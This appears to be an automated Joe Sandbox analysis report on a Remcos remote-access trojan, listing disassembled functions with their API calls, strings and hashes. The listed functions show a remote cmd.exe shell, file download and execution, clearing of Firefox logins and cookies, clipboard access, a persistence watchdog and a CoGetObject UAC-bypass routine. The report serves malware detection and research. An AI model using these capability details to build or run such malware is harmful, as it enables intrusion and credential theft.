Opcode Fuzzy Hash: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
Instruction Fuzzy Hash: 38B09B75108302FFC6150750CC0486A7D66DBC8351B00481C714641170C736C8519725

Uniqueness

Uniqueness Score: -1.00%

Function 00426C16 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,?), ref: 00426C20

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
Instruction ID: 80dceff54fd7c7607e374e8a405dba3f032bb15cdc3f4a53630576a73fa931ff
Opcode Fuzzy Hash: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
Instruction Fuzzy Hash: 79B09279108202FFCB150B60CD0887A7EAAABC8381F008A2CB187411B1C636C852AB26

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00407CB9
GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
DeleteFileW.KERNEL32(00000000), ref: 00407DA9

Part of subcall function 0041C1DF: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C23A
Part of subcall function 0041C1DF: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C26A
Part of subcall function 0041C1DF: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2BF
Part of subcall function 0041C1DF: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C320
Part of subcall function 0041C1DF: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C327

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Part of subcall function 0041B43D: GetLocalTime.KERNEL32(00000000), ref: 0041B457

Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
GetLogicalDriveStringsA.KERNEL32 ref: 00408278
SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
DeleteFileA.KERNEL32(?), ref: 00408652

Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF

Sleep.KERNEL32(000007D0), ref: 004086F8
StrToIntA.SHLWAPI(00000000), ref: 0040873A

Part of subcall function 0041C930: SystemParametersInfoW.USER32 ref: 0041CA25

Strings

Unable to rename file!, xrefs: 00408413
NG, xrefs: 00407CE5
XPG, xrefs: 00408718
Failed to download file: , xrefs: 004080A5
Downloading file: , xrefs: 00407F7D
(PG, xrefs: 004081F2
Browsing directory: , xrefs: 00408238
Unable to delete: , xrefs: 00407E07
Downloaded file: , xrefs: 0040802E
Executing file: , xrefs: 004081AD
Deleted file: , xrefs: 00407DC8
XPG, xrefs: 00407DED
XPG, xrefs: 00408430
open, xrefs: 00408191
XPG, xrefs: 004082E7

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
API String ID: 1067849700-181434739
Opcode ID: ac701cb6e9890822f773f84ccedcde51bb14943e6fb5b9d3ca1bacef7a5449d6
Instruction ID: 90b1a348b1d799a82cead3257c211a36afb2c35d21ecd37c7c023c3bbace4ffa
Opcode Fuzzy Hash: ac701cb6e9890822f773f84ccedcde51bb14943e6fb5b9d3ca1bacef7a5449d6
Instruction Fuzzy Hash: 8C428171A043016BC604FB76C9579AF77A5AF91348F80093FF542671E2EE7C9A08879B

Uniqueness

Uniqueness Score: -1.00%

Function 0040569A Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 278pipesleepfileCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004056E6

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

__Init_thread_footer.LIBCMT ref: 00405723
CreatePipe.KERNEL32(00476CBC,00476CA4,00476BC8,00000000,004660BC,00000000), ref: 004057B6
CreatePipe.KERNEL32(00476CA8,00476CC4,00476BC8,00000000), ref: 004057CC
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BD8,00476CAC), ref: 0040583F
Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9

Part of subcall function 004346BE: __onexit.LIBCMT ref: 004346C4

WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
TerminateProcess.KERNEL32(00000000), ref: 00405A17
CloseHandle.KERNEL32 ref: 00405A23
CloseHandle.KERNEL32 ref: 00405A2B
CloseHandle.KERNEL32 ref: 00405A3D
CloseHandle.KERNEL32 ref: 00405A45

Strings

lG, xrefs: 00405988
lG, xrefs: 0040585A
cmd.exe, xrefs: 0040574D
SystemDrive, xrefs: 00405761
lG, xrefs: 00405954
lG, xrefs: 00405A2D
lG, xrefs: 004056D0

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: lG$ lG$ lG$ lG$ lG$SystemDrive$cmd.exe
API String ID: 2994406822-4099966829
Opcode ID: 26b1a3c9128f601e5166ae4f7c8614949d9de5aad7c897069d26924e30a8192d
Instruction ID: de4e4ebcbe15d3830e6e521ad2e1eecf7f6dbcbc683575455a8755bc669fea45
Opcode Fuzzy Hash: 26b1a3c9128f601e5166ae4f7c8614949d9de5aad7c897069d26924e30a8192d
Instruction Fuzzy Hash: 1B91E471604604AFD711BB25ED42A6F3A9AEB80348F01443FF549A72E2DF7D5C488B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00412045 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00412054

Part of subcall function 004137C5: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 004137D3
Part of subcall function 004137C5: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004137EE
Part of subcall function 004137C5: RegCloseKey.KERNEL32(004660A4), ref: 004137F9

OpenMutexA.KERNEL32 ref: 00412094
CloseHandle.KERNEL32(00000000), ref: 004120A3
CreateThread.KERNEL32(00000000,00000000,0041273C,00000000,00000000,00000000), ref: 004120F9
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412368

Strings

WinDir, xrefs: 00412169, 004121BE
\system32\, xrefs: 00412157
rmclient.exe, xrefs: 00412238
WDH, xrefs: 00412103, 00412109, 0041236E
svchost.exe, xrefs: 00412213
Remcos restarted by watchdog!, xrefs: 004120AE
Watchdog module activated, xrefs: 004120D2, 0041232A
fsutil.exe, xrefs: 0041225D
Watchdog launch failed!, xrefs: 004122D1
\SysWOW64\, xrefs: 004121AF

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
API String ID: 3018269243-13974260
Opcode ID: 934ef4a079685439f74104347cb6ef5f5026a0e4b7f2409a0433a6fb77c88eb9
Instruction ID: 0d13d43ad637dff1fe81996a96760afe0bf10590795afb9f1943340568bde94f
Opcode Fuzzy Hash: 934ef4a079685439f74104347cb6ef5f5026a0e4b7f2409a0433a6fb77c88eb9
Instruction Fuzzy Hash: 2071A03160430167C218FB72DD5B9AE77A4AF94708F40057FB586A20E2FFBC9949C69A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA7E Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BAFD
FindClose.KERNEL32(00000000), ref: 0040BB17
FindNextFileA.KERNEL32(00000000,?), ref: 0040BC3A
FindClose.KERNEL32(00000000), ref: 0040BC60

Strings

\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040BAA0
[Firefox StoredLogins Cleared!], xrefs: 0040BC4D
[Firefox StoredLogins not found], xrefs: 0040BB22
\key3.db, xrefs: 0040BBC4
\logins.json, xrefs: 0040BB82
UserProfile, xrefs: 0040BAAE

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: b7ff0b334e66b397f6b5f2ce9c9ac90d4baeb29ca37303a0e564a64990128067
Instruction ID: 0c444b27639c9c5018b15d678d008ce1e60e4a17353ccb3dd71c17b9335bc626
Opcode Fuzzy Hash: b7ff0b334e66b397f6b5f2ce9c9ac90d4baeb29ca37303a0e564a64990128067
Instruction Fuzzy Hash: 11515D3190421A9ADB14F7A2DC56DEEB739AF11304F50057FF406760E2EF785A89CA8D

Uniqueness

Uniqueness Score: -1.00%

Function 0041680F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00416810
EmptyClipboard.USER32 ref: 0041681E
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041683E
GlobalLock.KERNEL32 ref: 00416847
GlobalUnlock.KERNEL32(00000000), ref: 0041687D
SetClipboardData.USER32 ref: 00416886
CloseClipboard.USER32 ref: 004168A3
OpenClipboard.USER32 ref: 004168AA
GetClipboardData.USER32 ref: 004168BA
GlobalLock.KERNEL32 ref: 004168C3
GlobalUnlock.KERNEL32(00000000), ref: 004168CC
CloseClipboard.USER32 ref: 004168D2

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

!D@, xrefs: 00416FD7

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
String ID: !D@
API String ID: 3520204547-604454484
Opcode ID: c1d171bd890241d5e8cfd3adb8b558aa5b5ed97c4b323f8f4a8112abfc0a93e7
Instruction ID: 0fc0cf295518fbfb68c3eb210c1eb1d2336127672aab31fcd858d8c2724b716e
Opcode Fuzzy Hash: c1d171bd890241d5e8cfd3adb8b558aa5b5ed97c4b323f8f4a8112abfc0a93e7
Instruction Fuzzy Hash: 8D215171204301EBD714BBB1DC5D9BE36A9AF88742F40043EF946961E2EF38CC05C66A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC85 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BCFD
FindClose.KERNEL32(00000000), ref: 0040BD17
FindNextFileA.KERNEL32(00000000,?), ref: 0040BDD7
FindClose.KERNEL32(00000000), ref: 0040BDFD
FindClose.KERNEL32(00000000), ref: 0040BE1E

Strings

\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040BCA0
[Firefox cookies found, cleared!], xrefs: 0040BE2D
[Firefox Cookies not found], xrefs: 0040BD22, 0040BDEA
\cookies.sqlite, xrefs: 0040BD7A
UserProfile, xrefs: 0040BCAE

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$Close$File$FirstNext
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 3527384056-432212279
Opcode ID: 18c6914aedbf4db8a083bc69dad6fea508443dcb85a011d8fffe1fc42ea87272
Instruction ID: 32b23487147a816041c30da2224dce557673570347bddc60567f1f366ddad262
Opcode Fuzzy Hash: 18c6914aedbf4db8a083bc69dad6fea508443dcb85a011d8fffe1fc42ea87272
Instruction Fuzzy Hash: 28417F3190021AAADB04FBA6DC569EEB768AF11704F50057FF506B20D2FF3C5A49CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040F3C2 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F3DC
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F407
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F423
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F4A2
CloseHandle.KERNEL32(00000000), ref: 0040F4B1

Part of subcall function 0041C12B: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C143
Part of subcall function 0041C12B: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C156

CloseHandle.KERNEL32(00000000), ref: 0040F5BC

Strings

ielowutil.exe, xrefs: 0040F664
C:\Program Files(x86)\Internet Explorer\, xrefs: 0040F60C
Inj, xrefs: 0040F6B7
ieinstal.exe, xrefs: 0040F623

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
API String ID: 3756808967-1743721670
Opcode ID: 149f83f78c0dcefb94a93c5616230e5a81f93e49b46487426d8ad3e4f4ac1731
Instruction ID: 5018d2d9c90dbd6d6fe108ccdeab389871d3560f6d607c0aa7ec0a5772391e24
Opcode Fuzzy Hash: 149f83f78c0dcefb94a93c5616230e5a81f93e49b46487426d8ad3e4f4ac1731
Instruction Fuzzy Hash: B7714E705083429BC724EB21D8919AEB7A4AF94348F40483FF586631E3EF7C994DCB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00419575 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON

Download Yara Rule

Strings

5, xrefs: 00419757
3, xrefs: 004196A2
7, xrefs: 00419778
6, xrefs: 00419761
2, xrefs: 00419642
1, xrefs: 004195E3
0, xrefs: 0041959F
VG, xrefs: 004195D9
4, xrefs: 00419706

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7$VG
API String ID: 0-1861860590
Opcode ID: 13c334033b35c610f53346a6141b88d5a34a173366e14a26250f9f9a851070ab
Instruction ID: 9e09b7185deedc0a3188928efce079fdeb8dc50ce9f7ebeb8d7f12ba87488783
Opcode Fuzzy Hash: 13c334033b35c610f53346a6141b88d5a34a173366e14a26250f9f9a851070ab
Instruction Fuzzy Hash: C071C2709183019FD704EF21D8A2BEB7794AF45310F10491EF5A26B2D1DE78AB49CB97

Uniqueness

Uniqueness Score: -1.00%

Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00407521
CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582

Strings

Elevation:Administrator!new:, xrefs: 00407542
[+] CoGetObject, xrefs: 00407561
[-] CoGetObject FAILURE, xrefs: 0040758E
$, xrefs: 0040753B
[+] CoGetObject SUCCESS, xrefs: 00407595
{3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 00407516, 0040751B, 0040755A
[+] ucmAllocateElevatedObject, xrefs: 00407508

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Object_wcslen
String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
API String ID: 240030777-3166923314
Opcode ID: 76d15d0fb56d7a8d8e1e460f28c31beb9cf9d21763891b71753c9d2bdaa02437
Instruction ID: 08efd04b626cbfc978d5ebff47a7608052b1d371e0bd854913493cebd1a15ee8
Opcode Fuzzy Hash: 76d15d0fb56d7a8d8e1e460f28c31beb9cf9d21763891b71753c9d2bdaa02437
Instruction Fuzzy Hash: AB117372D04218BAD710E6959C46BDEB7BC9B08714F25007BF904B3382E77CAA4486BF

Uniqueness

Uniqueness Score: -1.00%

Function 0041A696 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A6AC
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A6FB
GetLastError.KERNEL32 ref: 0041A709
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A741

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: 769e19010091a10af603ec6064f006fce51f72d7757b0d85379757bf1259302b
Instruction ID: 98f091b54933f8dc116b4dcc422d911b8a3664dfb3dab3f2e6005b1ed7f3cac0
Opcode Fuzzy Hash: 769e19010091a10af603ec6064f006fce51f72d7757b0d85379757bf1259302b
Instruction Fuzzy Hash: 49817471104301ABC314EF61D885DAFB7A8FF94709F50082EF185521A2EF78EE48CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C29B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C2E9
FindNextFileW.KERNEL32(00000000,?), ref: 0040C3BC
FindClose.KERNEL32(00000000), ref: 0040C3CB
FindClose.KERNEL32(00000000), ref: 0040C3F6

Strings

\Mozilla\Firefox\Profiles\, xrefs: 0040C2BC
\cookies.sqlite, xrefs: 0040C357
AppData, xrefs: 0040C2A6

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 1164774033-405221262
Opcode ID: 699344f23bb1b10346404d33fdf50addb603410f78110bd40cf2ec3d3eec60a7
Instruction ID: fef4d65b9f20089db2f88367438c0b90451e8f61a7647c86833f6491ac69dca9
Opcode Fuzzy Hash: 699344f23bb1b10346404d33fdf50addb603410f78110bd40cf2ec3d3eec60a7
Instruction Fuzzy Hash: DD315E3190021AAACB14F7A1DC9ADAE7778AF10718F10017FF506B20D2FF78994ACA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041C1DF Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C23A
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C26A
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2DC
DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2E9

Part of subcall function 0041C1DF: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2BF

GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C30A
FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C320
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C327
FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C330

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: 571a63e77e9d579d1df3fcb8ff562e8e9559788ee97b6b046b3cc0c74534924d
Instruction ID: 658f290bacfa54b2639a90bd0fd1c4fed19c92f365caa476b4101e6107ecc85f
Opcode Fuzzy Hash: 571a63e77e9d579d1df3fcb8ff562e8e9559788ee97b6b046b3cc0c74534924d
Instruction Fuzzy Hash: 0731827284421CAADB20E7A1DC89EDB737CAF09305F5405FBF555D2052EB399EC88A58

Uniqueness

Uniqueness Score: -1.00%

Function 00419A43 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00419C99
FindNextFileW.KERNEL32(00000000,?,?), ref: 00419D65

Part of subcall function 0041C3D3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C3EC

Strings

NG, xrefs: 00419A73
PXG, xrefs: 00419D7C
PXG, xrefs: 00419C16
PG, xrefs: 00419B23
8SG, xrefs: 00419B39

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Find$CreateFirstNext
String ID: 8SG$PXG$PXG$NG$PG
API String ID: 341183262-3812160132
Opcode ID: c0972424717436cc66836734276a5bdc746e32b3ffa280e9fa171c0f3fa6bc71
Instruction ID: 244e5bd26970ee64e0f805b201a5ce69ae47f76faa5f1ec663fe2ae2e6e217cd
Opcode Fuzzy Hash: c0972424717436cc66836734276a5bdc746e32b3ffa280e9fa171c0f3fa6bc71
Instruction Fuzzy Hash: F08175315082419BC314FB22DC56EEF73A9AF90344F40493FF546671E2EF789949C69A

Uniqueness

Uniqueness Score: -1.00%

Function 00413F18 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000), ref: 00413FEB
RegCloseKey.ADVAPI32(?), ref: 00413FF7

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004141B8
GetProcAddress.KERNEL32(00000000), ref: 004141BF

Strings

SHDeleteKeyW, xrefs: 004141AE
Shlwapi.dll, xrefs: 004141B3

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: 9a3b52a58f16fee281c9eb19409047f4ffb3639dee08a1fa0a63ed3acd80ab22
Instruction ID: 641828d4a39e843f2430769769f5c1217e4fdfd89ddfed3c8fa3b4965f6deed4
Opcode Fuzzy Hash: 9a3b52a58f16fee281c9eb19409047f4ffb3639dee08a1fa0a63ed3acd80ab22
Instruction Fuzzy Hash: 8EB10672A0430066C614BB76CD579EE36A85FD1748F40053FF902B71E2EE7C9A4886DE

Uniqueness

Uniqueness Score: -1.00%

Function 00449050 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004490D2
_free.LIBCMT ref: 004490F6
_free.LIBCMT ref: 0044927D
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 0044928F
WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449307
WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449334
_free.LIBCMT ref: 00449449

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: a4d3cbb327fe789d5e21289144d82174c7e5820591d230e8190bcda12e99bbba
Instruction ID: 8213b5658e312fa0c8719fd21ead51c50bd85158425f8b852127bd6d3b2d9e40
Opcode Fuzzy Hash: a4d3cbb327fe789d5e21289144d82174c7e5820591d230e8190bcda12e99bbba
Instruction Fuzzy Hash: 6DC14971900205ABFB249F798D85AAFBBB8EF46314F1441AFE88497391E7388D41E75C

Uniqueness

Uniqueness Score: -1.00%

Function 00416702 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 004178A0: GetCurrentProcess.KERNEL32(00000028,?), ref: 004178AD
Part of subcall function 004178A0: OpenProcessToken.ADVAPI32(00000000), ref: 004178B4
Part of subcall function 004178A0: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004178C6
Part of subcall function 004178A0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004178E5
Part of subcall function 004178A0: GetLastError.KERNEL32 ref: 004178EB

ExitWindowsEx.USER32(00000000,00000001), ref: 004167A4
LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004167B9
GetProcAddress.KERNEL32(00000000), ref: 004167C0

Strings

SetSuspendState, xrefs: 004167AF
PowrProf.dll, xrefs: 004167B4
!D@, xrefs: 00416FD7

Memory Dump Source

Source File: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Yara matches

Similarity

